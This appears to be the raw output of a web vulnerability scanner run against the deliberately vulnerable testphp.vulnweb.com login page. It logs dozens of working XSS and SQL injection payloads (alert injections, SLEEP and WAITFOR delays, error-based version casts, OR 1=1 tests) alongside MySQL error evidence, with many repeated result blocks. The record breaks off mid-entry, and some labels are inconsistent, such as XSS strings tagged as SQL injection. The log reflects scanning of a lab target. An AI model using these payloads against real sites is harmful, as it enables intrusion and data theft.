
handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: <svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(1);//'>
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.47s
Response_Length: 238
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: ';}<h1>test</h1>//
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.48s
Response_Length: 239
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Pattern_Type: html_injection
payload: ';}<h1>test</h1>//
Confidence: 50
Evidence: HTML tag injected <h1>test</h1> 
Response_Time: 0.48s
Response_Length: 239
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Pattern_Type: reflected
payload: ';}<h1>test</h1>//
Confidence: 50
Evidence: Payload reflected: ';}<h1>test</h1>//
Response_Time: 0.48s
Response_Length: 239
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: '"<script>alert({{1234**3}})</script><!---
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.51s
Response_Length: 212
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: <img src=x onerror='javascript:alert(6)'>
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.51s
Response_Length: 272
Alert_Triggered: True
Alert_Message: 6
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Pattern_Type: alert_triggered
payload: <img src=x onerror='javascript:alert(6)'>
Confidence: 70
Evidence: JavaScript alert triggered
Response_Time: 0.51s
Response_Length: 272
Alert_Triggered: True
Alert_Message: 6
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: <img src='a' alt="test" onload=javascript%3Aalert`6`>
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.50s
Response_Length: 239
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: /**/a';${1234**3};'--%20-
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.50s
Response_Length: 248
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: '"<script>#{1234**3};alert(1)</script><img src=x onerror=alert(2)><!--
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.46s
Response_Length: 192
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: " onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.24s
Response_Length: 249
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: '"><iframe onload=alert('{{1234**3}}');>
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.23s
Response_Length: 245
Alert_Triggered: True
Alert_Message: {{1234**3}}
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Pattern_Type: alert_triggered
payload: '"><iframe onload=alert('{{1234**3}}');>
Confidence: 70
Evidence: JavaScript alert triggered
Response_Time: 0.23s
Response_Length: 245
Alert_Triggered: True
Alert_Message: {{1234**3}}
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: ' OR WAITFOR DELAY "00:00:05"-- 
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.35s
Response_Length: 217
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: ' AND SLEEP(5)/*
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.35s
Response_Length: 184
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: time_delay
payload: SLEEP(5) /*' or SLEEP(5) or '" or SLEEP(5) or "*/
Confidence: 60
Evidence: Response delayed 10.21s
Response_Time: 10.21s
Response_Length: 0
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: "' AND IF(1=1,SLEEP(5),0)--
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.17s
Response_Length: 181
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: ' OR pg_sleep(5)
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.17s
Response_Length: 182
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: ' || BEGIN DBMS_SESSION.SLEEP(5); END; -- 
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.17s
Response_Length: 233
------------------------------------------------------------------


handler: common
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Pattern_Type: error
payload: ' || BEGIN DBMS_SESSION.SLEEP(5); END; -- 
Confidence: 70
Evidence: SQL error detected (MySQL)
Response_Time: 0.17s
Response_Length: 233
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Error-Based SQL Injection
payload: ' AND cast(version() as integer) > 0-- -
Confidence: 100
Evidence: Error message observed in response DBMS: None 
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Error-Based SQL Injection
payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Confidence: 100
Evidence: Error message observed in response DBMS: None 
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Error-Based SQL Injection
payload: ' AND 1=convert(int,@@version)-- -
Confidence: 100
Evidence: Error message observed in response DBMS: None 
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Error-Based SQL Injection
payload: ' AND 1=cast((SELECT @@version) as int)-- -
Confidence: 100
Evidence: Error message observed in response DBMS: None 
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Error-Based SQL Injection
payload: ' + convert(int,@@version) + '
Confidence: 100
Evidence: Error message observed in response DBMS: None 
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Boolean-Based SQL Injection
payload: '); or 1=1 -- -
Confidence: 100
Evidence: Shows a significant difference from normal input DBMS: None
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Boolean-Based SQL Injection
payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Confidence: 100
Evidence: Shows a significant difference from normal input DBMS: None
------------------------------------------------------------------


handler: advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Detail_Vuln: Boolean-Based SQL Injection
payload: ' AND IIF(1=1,1,0)--
Confidence: 100
Evidence: Shows a significant difference from normal input DBMS: None
------------------------------------------------------------------


Final Arrange Result

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: <svg/onload='+/"`/+/onmouseover=1/+/[*/[]/+alert(1);//'>
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: ';}<h1>test</h1>//
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Detected: True
Common_payload: ';}<h1>test</h1>//
Common_Confidence: 50
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Detected: True
Common_payload: ';}<h1>test</h1>//
Common_Confidence: 50
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: '"<script>alert({{1234**3}})</script><!---
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: <img src=x onerror='javascript:alert(6)'>
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: xss
Detected: True
Common_payload: <img src=x onerror='javascript:alert(6)'>
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: <img src='a' alt="test" onload=javascript%3Aalert`6`>
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: /**/a';${1234**3};'--%20-
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: '"<script>#{1234**3};alert(1)</script><img src=x onerror=alert(2)><!--
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: " onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=convert(int,@@version)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast((SELECT @@version) as int)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' + convert(int,@@version) + '
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: '); or 1=1 -- -
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' OR (SELECT CASE WHEN (1=1) THEN 'true' ELSE 'false' END) = 'true'--
Advanced_Confidence: 100
Detail_Vuln: Boolean-Based SQL Injection
Advanced_payload: ' AND IIF(1=1,1,0)--
Advanced_Confidence: 100
------------------------------------------------------------------

handler: common, advanced
url: http://testphp.vulnweb.com/login.php
parameters: ['uname', 'pass', 'test', 'searchFor']
method: GET
Type: sql_injection
Detected: True
Common_payload: '"><iframe onload=alert('{{1234**3}}');>
Common_Confidence: 70
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND cast(version() as integer) > 0-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
Advanced_payload: ' AND 1=cast(chr(126)||version()||chr(126) AS NUMERIC)-- -
Advanced_Confidence: 100
Context: Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '
Detail_Vuln: Error-Based SQL Injection
